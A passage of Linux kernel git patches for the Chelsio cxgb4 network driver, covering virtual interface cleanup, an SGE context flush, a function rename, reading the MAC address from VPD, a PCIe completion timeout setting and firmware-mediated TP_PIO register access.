nulls, sizeof(nic->ip_addr))) + if (address_not_null(nic->ip_addr)) rc = S_IRUGO; break; case ISCSI_BOOT_ETH_SUBNET_MASK: @@ -456,21 +468,19 @@ static umode_t ibft_check_nic_for(void *data, int type) rc = S_IRUGO; break; case ISCSI_BOOT_ETH_GATEWAY: - if (memcmp(nic->gateway, nulls, sizeof(nic->gateway))) + if (address_not_null(nic->gateway)) rc = S_IRUGO; break; case ISCSI_BOOT_ETH_PRIMARY_DNS: - if (memcmp(nic->primary_dns, nulls, - sizeof(nic->primary_dns))) + if (address_not_null(nic->primary_dns)) rc = S_IRUGO; break; case ISCSI_BOOT_ETH_SECONDARY_DNS: - if (memcmp(nic->secondary_dns, nulls, - sizeof(nic->secondary_dns))) + if (address_not_null(nic->secondary_dns)) rc = S_IRUGO; break; case ISCSI_BOOT_ETH_DHCP: - if (memcmp(nic->dhcp, nulls, sizeof(nic->dhcp))) + if (address_not_null(nic->dhcp)) rc = S_IRUGO; break; case ISCSI_BOOT_ETH_VLAN: @@ -536,23 +546,19 @@ static umode_t __init ibft_check_initiator_for(void *data, int type) rc = S_IRUGO; break; case ISCSI_BOOT_INI_ISNS_SERVER: - if (memcmp(init->isns_server, nulls, - sizeof(init->isns_server))) + if (address_not_null(init->isns_server)) rc = S_IRUGO; break; case ISCSI_BOOT_INI_SLP_SERVER: - if (memcmp(init->slp_server, nulls, - sizeof(init->slp_server))) + if (address_not_null(init->slp_server)) rc = S_IRUGO; break; case ISCSI_BOOT_INI_PRI_RADIUS_SERVER: - if (memcmp(init->pri_radius_server, nulls, - sizeof(init->pri_radius_server))) + if (address_not_null(init->pri_radius_server)) rc = S_IRUGO; break; case ISCSI_BOOT_INI_SEC_RADIUS_SERVER: - if (memcmp(init->sec_radius_server, nulls, - sizeof(init->sec_radius_server))) + if (address_not_null(init->sec_radius_server)) rc = S_IRUGO; break; case ISCSI_BOOT_INI_INITIATOR_NAME: From 4f3a0fcfb64b107bfbec0779a02438b321cc5dcf Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Fri, 5 Jun 2015 14:24:47 +0530 Subject: [PATCH 729/872] cxgb4: Free Virtual Interfaces in remove routine Free VI interfaces in remove routine. If we don't do this then the firmware will never drop the physical link to the peer. Signed-off-by: Hariprasad Shenai Signed-off-by: David S. 
Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 3 +++ .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 5 ++++ drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 27 +++++++++++++++++++ 3 files changed, 35 insertions(+) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index bf2b822d0e8e..93e6cbc3b4a8 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -1378,6 +1378,9 @@ int t4_cfg_pfvf(struct adapter *adap, unsigned int mbox, unsigned int pf, int t4_alloc_vi(struct adapter *adap, unsigned int mbox, unsigned int port, unsigned int pf, unsigned int vf, unsigned int nmac, u8 *mac, unsigned int *rss_size); +int t4_free_vi(struct adapter *adap, unsigned int mbox, + unsigned int pf, unsigned int vf, + unsigned int viid); int t4_set_rxmode(struct adapter *adap, unsigned int mbox, unsigned int viid, int mtu, int promisc, int all_multi, int bcast, int vlanex, bool sleep_ok); diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 305715484004..e6abdb7cdcae 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -4538,6 +4538,11 @@ static void free_some_resources(struct adapter *adapter) for_each_port(adapter, i) if (adapter->port[i]) { + struct port_info *pi = adap2pinfo(adapter, i); + + if (pi->viid != 0) + t4_free_vi(adapter, adapter->mbox, adapter->pf, + 0, pi->viid); kfree(adap2pinfo(adapter, i)->rss); free_netdev(adapter->port[i]); } diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index c21ab2686a69..3a56254f27a8 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -5225,6 +5225,33 @@ int t4_alloc_vi(struct adapter *adap, unsigned int mbox, unsigned int port, return FW_VI_CMD_VIID_G(be16_to_cpu(c.type_viid)); } +/** + * t4_free_vi - free a virtual interface + * @adap: the adapter + * @mbox: mailbox to use for the FW command + * @pf: the PF owning the VI + * @vf: the VF owning the VI + * @viid: virtual interface identifiler + * + * Free a previously allocated virtual interface. + */ +int t4_free_vi(struct adapter *adap, unsigned int mbox, unsigned int pf, + unsigned int vf, unsigned int viid) +{ + struct fw_vi_cmd c; + + memset(&c, 0, sizeof(c)); + c.op_to_vfn = cpu_to_be32(FW_CMD_OP_V(FW_VI_CMD) | + FW_CMD_REQUEST_F | + FW_CMD_EXEC_F | + FW_VI_CMD_PFN_V(pf) | + FW_VI_CMD_VFN_V(vf)); + c.alloc_to_len16 = cpu_to_be32(FW_VI_CMD_FREE_F | FW_LEN16(c)); + c.type_viid = cpu_to_be16(FW_VI_CMD_VIID_V(viid)); + + return t4_wr_mbox(adap, mbox, &c, sizeof(c), &c); +} + /** * t4_set_rxmode - set Rx properties of a virtual interface * @adap: the adapter From 5d700ecb06275af22b3db6559eb5b3d7a8e6bf70 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Fri, 5 Jun 2015 14:24:48 +0530 Subject: [PATCH 730/872] cxgb4: Add sge ec context flush service Add function to flush the sge ec context cache, and utilize this new function in the driver Signed-off-by: Hariprasad Shenai Signed-off-by: David S. 
Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 1 + .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 5 +--- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 26 +++++++++++++++++++ drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h | 6 ++++- 4 files changed, 33 insertions(+), 5 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 93e6cbc3b4a8..1043d7ae31e1 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -1410,6 +1410,7 @@ int t4_ctrl_eq_free(struct adapter *adap, unsigned int mbox, unsigned int pf, unsigned int vf, unsigned int eqid); int t4_ofld_eq_free(struct adapter *adap, unsigned int mbox, unsigned int pf, unsigned int vf, unsigned int eqid); +int t4_sge_ctxt_flush(struct adapter *adap, unsigned int mbox); int t4_handle_fw_rpl(struct adapter *adap, const __be64 *rpl); void t4_db_full(struct adapter *adapter); void t4_db_dropped(struct adapter *adapter); diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index e6abdb7cdcae..3ca7e247414f 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -2007,11 +2007,8 @@ EXPORT_SYMBOL(cxgb4_iscsi_init); int cxgb4_flush_eq_cache(struct net_device *dev) { struct adapter *adap = netdev2adap(dev); - int ret; - ret = t4_fwaddrspace_write(adap, adap->mbox, - 0xe1000000 + SGE_CTXT_CMD_A, 0x20000000); - return ret; + return t4_sge_ctxt_flush(adap, adap->mbox); } EXPORT_SYMBOL(cxgb4_flush_eq_cache); diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index 3a56254f27a8..e24f650d719a 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -4529,6 +4529,32 @@ void t4_sge_decode_idma_state(struct adapter *adapter, int state) sge_regs[i], t4_read_reg(adapter, sge_regs[i])); } +/** + * t4_sge_ctxt_flush - flush the SGE context cache + * @adap: the adapter + * @mbox: mailbox to use for the FW command + * + * Issues a FW command through the given mailbox to flush the + * SGE context cache. 
+ */ +int t4_sge_ctxt_flush(struct adapter *adap, unsigned int mbox) +{ + int ret; + u32 ldst_addrspace; + struct fw_ldst_cmd c; + + memset(&c, 0, sizeof(c)); + ldst_addrspace = FW_LDST_CMD_ADDRSPACE_V(FW_LDST_ADDRSPC_SGE_EGRC); + c.op_to_addrspace = cpu_to_be32(FW_CMD_OP_V(FW_LDST_CMD) | + FW_CMD_REQUEST_F | FW_CMD_READ_F | + ldst_addrspace); + c.cycles_to_len16 = cpu_to_be32(FW_LEN16(c)); + c.u.idctxt.msg_ctxtflush = cpu_to_be32(FW_LDST_CMD_CTXTFLUSH_F); + + ret = t4_wr_mbox(adap, mbox, &c, sizeof(c), &c); + return ret; +} + /** * t4_fw_hello - establish communication with FW * @adap: the adapter diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h b/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h index aceb1e8cacc8..ab4674684acc 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h @@ -772,7 +772,7 @@ struct fw_ldst_cmd { } addrval; struct fw_ldst_idctxt { __be32 physid; - __be32 msg_pkd; + __be32 msg_ctxtflush; __be32 ctxt_data7; __be32 ctxt_data6; __be32 ctxt_data5; @@ -834,6 +834,10 @@ struct fw_ldst_cmd { #define FW_LDST_CMD_MSG_S 31 #define FW_LDST_CMD_MSG_V(x) ((x) << FW_LDST_CMD_MSG_S) +#define FW_LDST_CMD_CTXTFLUSH_S 30 +#define FW_LDST_CMD_CTXTFLUSH_V(x) ((x) << FW_LDST_CMD_CTXTFLUSH_S) +#define FW_LDST_CMD_CTXTFLUSH_F FW_LDST_CMD_CTXTFLUSH_V(1U) + #define FW_LDST_CMD_PADDR_S 8 #define FW_LDST_CMD_PADDR_V(x) ((x) << FW_LDST_CMD_PADDR_S) From 4036da9012019f2214be3bc3598a8234953e035f Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Fri, 5 Jun 2015 14:24:49 +0530 Subject: [PATCH 731/872] cxgb4: Rename t4_link_start() to t4_link_l1cfg t4_link_start() was completely misnamed. It does _not_ start up the link. It merely does the L1 Configuration for the link. The Link Up process is started automatically by the firmware when the number of enabled Virtual Interfaces on a port goes from 0 to 1. So renaming this routine to t4_link_l1cfg() for better documentation. Signed-off-by: Hariprasad Shenai Signed-off-by: David S. 
Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 2 +- drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c | 4 ++-- drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c | 2 +- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 4 ++-- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 1043d7ae31e1..4ab5a2dcde9e 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -1229,7 +1229,7 @@ void t4_intr_disable(struct adapter *adapter); int t4_slow_intr_handler(struct adapter *adapter); int t4_wait_dev_ready(void __iomem *regs); -int t4_link_start(struct adapter *adap, unsigned int mbox, unsigned int port, +int t4_link_l1cfg(struct adapter *adap, unsigned int mbox, unsigned int port, struct link_config *lc); int t4_restart_aneg(struct adapter *adap, unsigned int mbox, unsigned int port); diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c index 0194c91a0486..687acf71fa15 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c @@ -646,7 +646,7 @@ static int set_settings(struct net_device *dev, struct ethtool_cmd *cmd) lc->autoneg = cmd->autoneg; if (netif_running(dev)) - return t4_link_start(p->adapter, p->adapter->pf, p->tx_chan, + return t4_link_l1cfg(p->adapter, p->adapter->pf, p->tx_chan, lc); return 0; } @@ -679,7 +679,7 @@ static int set_pauseparam(struct net_device *dev, if (epause->tx_pause) lc->requested_fc |= PAUSE_TX; if (netif_running(dev)) - return t4_link_start(p->adapter, p->adapter->pf, p->tx_chan, + return t4_link_l1cfg(p->adapter, p->adapter->pf, p->tx_chan, lc); return 0; } diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 3ca7e247414f..4cb7eed93b5e 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -481,7 +481,7 @@ static int link_start(struct net_device *dev) } } if (ret == 0) - ret = t4_link_start(pi->adapter, mb, pi->tx_chan, + ret = t4_link_l1cfg(pi->adapter, mb, pi->tx_chan, &pi->link_cfg); if (ret == 0) { local_bh_disable(); diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index e24f650d719a..6d5b0f4be75b 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -2579,7 +2579,7 @@ void t4_ulprx_read_la(struct adapter *adap, u32 *la_buf) FW_PORT_CAP_ANEG) /** - * t4_link_start - apply link configuration to MAC/PHY + * t4_link_l1cfg - apply link configuration to MAC/PHY * @phy: the PHY to setup * @mac: the MAC to setup * @lc: the requested link configuration @@ -2591,7 +2591,7 @@ void t4_ulprx_read_la(struct adapter *adap, u32 *la_buf) * - If auto-negotiation is off set the MAC to the proper speed/duplex/FC, * otherwise do it later based on the outcome of auto-negotiation. 
*/ -int t4_link_start(struct adapter *adap, unsigned int mbox, unsigned int port, +int t4_link_l1cfg(struct adapter *adap, unsigned int mbox, unsigned int port, struct link_config *lc) { struct fw_port_cmd c; From 098ef6c28a956ba05c31fb9fbf8bad56165ed415 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Fri, 5 Jun 2015 14:24:50 +0530 Subject: [PATCH 732/872] cxgb4: Set mac addr from vpd, when we can't contact firmware Grab the Adapter MAC Address out of the VPD and use it for the "debug" network interface when either we can't contact the firmware Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 32 ++++++++++--- .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 21 +++++++-- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 47 +++++++++++++++---- 3 files changed, 81 insertions(+), 19 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 4ab5a2dcde9e..4d627a8f04b0 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -46,17 +46,19 @@ #include #include #include +#include #include #include "cxgb4_uld.h" #define CH_WARN(adap, fmt, ...) dev_warn(adap->pdev_dev, fmt, ## __VA_ARGS__) enum { - MAX_NPORTS = 4, /* max # of ports */ - SERNUM_LEN = 24, /* Serial # length */ - EC_LEN = 16, /* E/C length */ - ID_LEN = 16, /* ID length */ - PN_LEN = 16, /* Part Number length */ + MAX_NPORTS = 4, /* max # of ports */ + SERNUM_LEN = 24, /* Serial # length */ + EC_LEN = 16, /* E/C length */ + ID_LEN = 16, /* ID length */ + PN_LEN = 16, /* Part Number length */ + MACADDR_LEN = 12, /* MAC Address length */ }; enum { @@ -280,6 +282,7 @@ struct vpd_params { u8 sn[SERNUM_LEN + 1]; u8 id[ID_LEN + 1]; u8 pn[PN_LEN + 1]; + u8 na[MACADDR_LEN + 1]; }; struct pci_params { @@ -945,6 +948,22 @@ static inline void t4_write_reg64(struct adapter *adap, u32 reg_addr, u64 val) writeq(val, adap->regs + reg_addr); } +/** + * t4_set_hw_addr - store a port's MAC address in SW + * @adapter: the adapter + * @port_idx: the port index + * @hw_addr: the Ethernet address + * + * Store the Ethernet address of the given port in SW. Called by the common + * code when it retrieves a port's Ethernet address from EEPROM. 
+ */ +static inline void t4_set_hw_addr(struct adapter *adapter, int port_idx, + u8 hw_addr[]) +{ + ether_addr_copy(adapter->port[port_idx]->dev_addr, hw_addr); + ether_addr_copy(adapter->port[port_idx]->perm_addr, hw_addr); +} + /** * netdev2pinfo - return the port_info structure associated with a net_device * @dev: the netdev @@ -1251,7 +1270,8 @@ unsigned int t4_get_regs_len(struct adapter *adapter); void t4_get_regs(struct adapter *adap, void *buf, size_t buf_size); int t4_seeprom_wp(struct adapter *adapter, bool enable); -int get_vpd_params(struct adapter *adapter, struct vpd_params *p); +int t4_get_raw_vpd_params(struct adapter *adapter, struct vpd_params *p); +int t4_get_vpd_params(struct adapter *adapter, struct vpd_params *p); int t4_read_flash(struct adapter *adapter, unsigned int addr, unsigned int nwords, u32 *data, int byte_oriented); int t4_load_fw(struct adapter *adapter, const u8 *fw_data, unsigned int size); diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 4cb7eed93b5e..3897e2834674 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -3712,7 +3712,7 @@ static int adap_init0(struct adapter *adap) * the firmware. On the other hand, we need these fairly early on * so we do this right after getting ahold of the firmware. */ - ret = get_vpd_params(adap, &adap->params.vpd); + ret = t4_get_vpd_params(adap, &adap->params.vpd); if (ret < 0) goto bye; @@ -4735,10 +4735,25 @@ static int init_one(struct pci_dev *pdev, const struct pci_device_id *ent) err = t4_port_init(adapter, func, func, 0); if (err) goto out_free_dev; + } else if (adapter->params.nports == 1) { + /* If we don't have a connection to the firmware -- possibly + * because of an error -- grab the raw VPD parameters so we + * can set the proper MAC Address on the debug network + * interface that we've created. + */ + u8 hw_addr[ETH_ALEN]; + u8 *na = adapter->params.vpd.na; + + err = t4_get_raw_vpd_params(adapter, &adapter->params.vpd); + if (!err) { + for (i = 0; i < ETH_ALEN; i++) + hw_addr[i] = (hex2val(na[2 * i + 0]) * 16 + + hex2val(na[2 * i + 1])); + t4_set_hw_addr(adapter, 0, hw_addr); + } } - /* - * Configure queues and allocate tables now, they can be needed as + /* Configure queues and allocate tables now, they can be needed as * soon as the first register_netdev completes. */ cfg_queues(adapter); diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index 6d5b0f4be75b..da65e76c44b5 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -1729,17 +1729,16 @@ int t4_seeprom_wp(struct adapter *adapter, bool enable) } /** - * get_vpd_params - read VPD parameters from VPD EEPROM + * t4_get_raw_vpd_params - read VPD parameters from VPD EEPROM * @adapter: adapter to read * @p: where to store the parameters * * Reads card parameters stored in VPD EEPROM. */ -int get_vpd_params(struct adapter *adapter, struct vpd_params *p) +int t4_get_raw_vpd_params(struct adapter *adapter, struct vpd_params *p) { - u32 cclk_param, cclk_val; - int i, ret, addr; - int ec, sn, pn; + int i, ret = 0, addr; + int ec, sn, pn, na; u8 *vpd, csum; unsigned int vpdr_len, kw_offset, id_len; @@ -1747,6 +1746,9 @@ int get_vpd_params(struct adapter *adapter, struct vpd_params *p) if (!vpd) return -ENOMEM; + /* Card information normally starts at VPD_BASE but early cards had + * it at 0. 
+ */ ret = pci_read_vpd(adapter->pdev, VPD_BASE, sizeof(u32), vpd); if (ret < 0) goto out; @@ -1812,6 +1814,7 @@ int get_vpd_params(struct adapter *adapter, struct vpd_params *p) FIND_VPD_KW(ec, "EC"); FIND_VPD_KW(sn, "SN"); FIND_VPD_KW(pn, "PN"); + FIND_VPD_KW(na, "NA"); #undef FIND_VPD_KW memcpy(p->id, vpd + PCI_VPD_LRDT_TAG_SIZE, id_len); @@ -1824,18 +1827,42 @@ int get_vpd_params(struct adapter *adapter, struct vpd_params *p) i = pci_vpd_info_field_size(vpd + pn - PCI_VPD_INFO_FLD_HDR_SIZE); memcpy(p->pn, vpd + pn, min(i, PN_LEN)); strim(p->pn); + memcpy(p->na, vpd + na, min(i, MACADDR_LEN)); + strim((char *)p->na); - /* - * Ask firmware for the Core Clock since it knows how to translate the +out: + vfree(vpd); + return ret; +} + +/** + * t4_get_vpd_params - read VPD parameters & retrieve Core Clock + * @adapter: adapter to read + * @p: where to store the parameters + * + * Reads card parameters stored in VPD EEPROM and retrieves the Core + * Clock. This can only be called after a connection to the firmware + * is established. + */ +int t4_get_vpd_params(struct adapter *adapter, struct vpd_params *p) +{ + u32 cclk_param, cclk_val; + int ret; + + /* Grab the raw VPD parameters. + */ + ret = t4_get_raw_vpd_params(adapter, p); + if (ret) + return ret; + + /* Ask firmware for the Core Clock since it knows how to translate the * Reference Clock ('V2') VPD field into a Core Clock value ... */ cclk_param = (FW_PARAMS_MNEM_V(FW_PARAMS_MNEM_DEV) | FW_PARAMS_PARAM_X_V(FW_PARAMS_PARAM_DEV_CCLK)); - ret = t4_query_params(adapter, adapter->mbox, 0, 0, + ret = t4_query_params(adapter, adapter->mbox, adapter->pf, 0, 1, &cclk_param, &cclk_val); -out: - vfree(vpd); if (ret) return ret; p->cclk = cclk_val; From eca0f6eeadec74027a4f940bd6958c41e5259618 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Fri, 5 Jun 2015 14:24:51 +0530 Subject: [PATCH 733/872] cxgb4: program pci completion timeout Set pci completion timeout to 0xd. Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index da65e76c44b5..efd0aa1a224e 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -5847,6 +5847,22 @@ static int get_flash_params(struct adapter *adap) return 0; } +static void set_pcie_completion_timeout(struct adapter *adapter, u8 range) +{ + u16 val; + u32 pcie_cap; + + pcie_cap = pci_find_capability(adapter->pdev, PCI_CAP_ID_EXP); + if (pcie_cap) { + pci_read_config_word(adapter->pdev, + pcie_cap + PCI_EXP_DEVCTL2, &val); + val &= ~PCI_EXP_DEVCTL2_COMP_TIMEOUT; + val |= range; + pci_write_config_word(adapter->pdev, + pcie_cap + PCI_EXP_DEVCTL2, val); + } +} + /** * t4_prep_adapter - prepare SW and HW for operation * @adapter: the adapter @@ -5919,6 +5935,9 @@ int t4_prep_adapter(struct adapter *adapter) adapter->params.nports = 1; adapter->params.portvec = 1; adapter->params.vpd.cclk = 50000; + + /* Set pci completion timeout value to 4 seconds. */ + set_pcie_completion_timeout(adapter, 0xd); return 0; } From c1e9af0ca1f8adb7f3badfc027fa42ecfcb34956 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Fri, 5 Jun 2015 14:24:52 +0530 Subject: [PATCH 734/872] cxgb4: Use FW LDST cmd to access TP_PIO_{ADDR, DATA} register first The TP_PIO_{ADDR,DATA} registers are are in conflict with the firmware's use of these registers. 
Added a routine to access it through FW LDST cmd. Access all TP_PIO_{ADDR,DATA} register access through new routine if FW is alive. If firmware is dead, than fall back to indirect access. Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 2 +- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 102 ++++++++++++++---- 2 files changed, 83 insertions(+), 21 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 3897e2834674..0e27f2266e6b 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -4068,8 +4068,8 @@ static int adap_init0(struct adapter *adap) adap->params.b_wnd); } t4_init_sge_params(adap); - t4_init_tp_params(adap); adap->flags |= FW_OK; + t4_init_tp_params(adap); return 0; /* diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index efd0aa1a224e..b4110988536d 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -3632,6 +3632,40 @@ int t4_read_rss(struct adapter *adapter, u16 *map) return 0; } +/** + * t4_fw_tp_pio_rw - Access TP PIO through LDST + * @adap: the adapter + * @vals: where the indirect register values are stored/written + * @nregs: how many indirect registers to read/write + * @start_idx: index of first indirect register to read/write + * @rw: Read (1) or Write (0) + * + * Access TP PIO registers through LDST + */ +static void t4_fw_tp_pio_rw(struct adapter *adap, u32 *vals, unsigned int nregs, + unsigned int start_index, unsigned int rw) +{ + int ret, i; + int cmd = FW_LDST_ADDRSPC_TP_PIO; + struct fw_ldst_cmd c; + + for (i = 0 ; i < nregs; i++) { + memset(&c, 0, sizeof(c)); + c.op_to_addrspace = cpu_to_be32(FW_CMD_OP_V(FW_LDST_CMD) | + FW_CMD_REQUEST_F | + (rw ? FW_CMD_READ_F : + FW_CMD_WRITE_F) | + FW_LDST_CMD_ADDRSPACE_V(cmd)); + c.cycles_to_len16 = cpu_to_be32(FW_LEN16(c)); + + c.u.addrval.addr = cpu_to_be32(start_index + i); + c.u.addrval.val = rw ? 
0 : cpu_to_be32(vals[i]); + ret = t4_wr_mbox(adap, adap->mbox, &c, sizeof(c), &c); + if (!ret && rw) + vals[i] = be32_to_cpu(c.u.addrval.val); + } +} + /** * t4_read_rss_key - read the global RSS key * @adap: the adapter @@ -3641,8 +3675,11 @@ int t4_read_rss(struct adapter *adapter, u16 *map) */ void t4_read_rss_key(struct adapter *adap, u32 *key) { - t4_read_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, key, 10, - TP_RSS_SECRET_KEY0_A); + if (adap->flags & FW_OK) + t4_fw_tp_pio_rw(adap, key, 10, TP_RSS_SECRET_KEY0_A, 1); + else + t4_read_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, key, 10, + TP_RSS_SECRET_KEY0_A); } /** @@ -3668,8 +3705,11 @@ void t4_write_rss_key(struct adapter *adap, const u32 *key, int idx) (vrt & KEYEXTEND_F) && (KEYMODE_G(vrt) == 3)) rss_key_addr_cnt = 32; - t4_write_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, key, 10, - TP_RSS_SECRET_KEY0_A); + if (adap->flags & FW_OK) + t4_fw_tp_pio_rw(adap, (void *)key, 10, TP_RSS_SECRET_KEY0_A, 0); + else + t4_write_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, key, 10, + TP_RSS_SECRET_KEY0_A); if (idx >= 0 && idx < rss_key_addr_cnt) { if (rss_key_addr_cnt > 16) @@ -3694,8 +3734,12 @@ void t4_write_rss_key(struct adapter *adap, const u32 *key, int idx) void t4_read_rss_pf_config(struct adapter *adapter, unsigned int index, u32 *valp) { - t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, - valp, 1, TP_RSS_PF0_CONFIG_A + index); + if (adapter->flags & FW_OK) + t4_fw_tp_pio_rw(adapter, valp, 1, + TP_RSS_PF0_CONFIG_A + index, 1); + else + t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, + valp, 1, TP_RSS_PF0_CONFIG_A + index); } /** @@ -3730,10 +3774,15 @@ void t4_read_rss_vf_config(struct adapter *adapter, unsigned int index, /* Grab the VFL/VFH values ... */ - t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, - vfl, 1, TP_RSS_VFL_CONFIG_A); - t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, - vfh, 1, TP_RSS_VFH_CONFIG_A); + if (adapter->flags & FW_OK) { + t4_fw_tp_pio_rw(adapter, vfl, 1, TP_RSS_VFL_CONFIG_A, 1); + t4_fw_tp_pio_rw(adapter, vfh, 1, TP_RSS_VFH_CONFIG_A, 1); + } else { + t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, + vfl, 1, TP_RSS_VFL_CONFIG_A); + t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, + vfh, 1, TP_RSS_VFH_CONFIG_A); + } } /** @@ -3746,8 +3795,11 @@ u32 t4_read_rss_pf_map(struct adapter *adapter) { u32 pfmap; - t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, - &pfmap, 1, TP_RSS_PF_MAP_A); + if (adapter->flags & FW_OK) + t4_fw_tp_pio_rw(adapter, &pfmap, 1, TP_RSS_PF_MAP_A, 1); + else + t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, + &pfmap, 1, 